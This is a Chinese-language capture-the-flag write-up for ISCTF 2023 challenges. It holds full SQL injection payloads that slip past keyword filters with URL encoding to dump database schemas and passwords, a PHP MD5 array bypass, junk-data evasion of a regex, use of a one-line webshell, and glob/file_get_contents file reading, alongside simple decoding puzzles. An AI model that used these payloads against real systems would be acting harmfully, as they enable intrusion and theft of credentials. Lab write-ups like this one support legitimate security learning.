希望看完之后可以对你熟悉ctf比赛以及提高技术水平有所帮助!
9.where_is_the_flag

进⼊靶机

标准的⼀句话⽊⻢
打开蚁剑
添加数据


由此可以轻松拿到flag1

返回根⽬录⼜能找到flag2


最后flag3需要打开虚拟终端

echo $FLAG3

得到完整flag
10.绕进你的心里


分析命令⾏
get输⼊两个MD5值相等但不同的两个值
可以⽤数组的⽅式绕过
?hongmeng[0]=1&shennong[0]=2

接下来是post输⼊的pan_gu
stripos函数要求字符串中要包含2023ISCTF
preg_match正则匹配函数 /i 表示不区分⼤⼩写,/s 表示字⺟,不能让它匹配到ISCTF,垃圾数据逃
逸,⼤量垃圾数据使检测的过程崩溃

我在160k字典后⾯加上了2023ISCTF

得到flag
11.easy_website

sql注⼊,'显示数据库查询失败,说明是'闭合,⽽且有过滤

order变成了der,空格也没了
⽤url编码%6f代替o绕过or过滤,+代替空格
1'+%6frder+by+4+#

⼆分法继续往下爆字段

最后发现字段为1
经过测试发现union select也被过滤
全部转换为url编码
爆schema
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+schema_name+from+inf%6frmation_sche
ma.schemata+#

要让他显示多⾏内容要⽤到groupconcat函数
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(schema_name)+from+inf%6
frmation_schema.schemata+#

找到users的库⾥,继续爆table
where指定在users的库中
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(table_name)+from+inf%6frm
ation_schema.tables+where+table_schema='users'+#

爆column
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(column_name)+from+inf%6f
rmation_schema.columns+where+table_name='user'+#

在password列⾥找,明指 users数据库下的users表
and也⽤url编码绕过过滤
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(column_name)+from+inf%6f
rmation_schema.columns+where+table_schema='users'
+a%6ed+table_name='users'+#

最后看字段内容
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+passw%6frd+from+users.users+%23

还是⽤groupconcat
1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(passw%6frd)+from+users.us
ers+#

得到flag
12.wafr


找到没被过滤的并且能够读取⽂件的函数
var_dump() 显示参数信息/输出内容
file_get_contents() 将⽂件读⼊⼀个字符串
var_dump(file_get_contents("⽂件名")); file_get_contents将⽂件的内容以字符串的形式返回,
var_dump再对字符串进⾏输出,但是file_get_contents不⽀持通配符,那么需要⼀个函数⽀持通配符并
且能够返回匹配的flag⽂件路径
glob() 返回⼀个包含匹配的指定⽂件名或⽬录的数组,可以使⽤通配符
glob('/f*')[0] -> array[0]=flag.txt
*通配符匹配f开头的⽂件名

post:code=var_dump(file_fet_contents(glob('/f*')[0]))
得到flag
13.签到题

下载后是两张图⽚
随便拼接⼀下,扫描到蓝鲨信息公众号

得到flag
14.你说爱我?尊嘟假嘟

下载后改后缀为zip
解压得到⼀个⽂件

这是⼀个三元密码查到是Ook密码,⽤Ook解码需要转换格式,其中Ook.最多,把⽂档中的你说爱我全部替换为Ook.
经过测试尊嘟替换为Ook!假嘟替换为Ook?

https://www.splitbrain.org/services/ook

ild3l4pXejwPcCwJsPAOq7sJczdRdTsJcCEUsP1Z
⽤base64解码,这⾥是变种base64使⽤0-9a-zA-Z+/ =为填充

得到flag
有任何问题都可以随时关注私信!



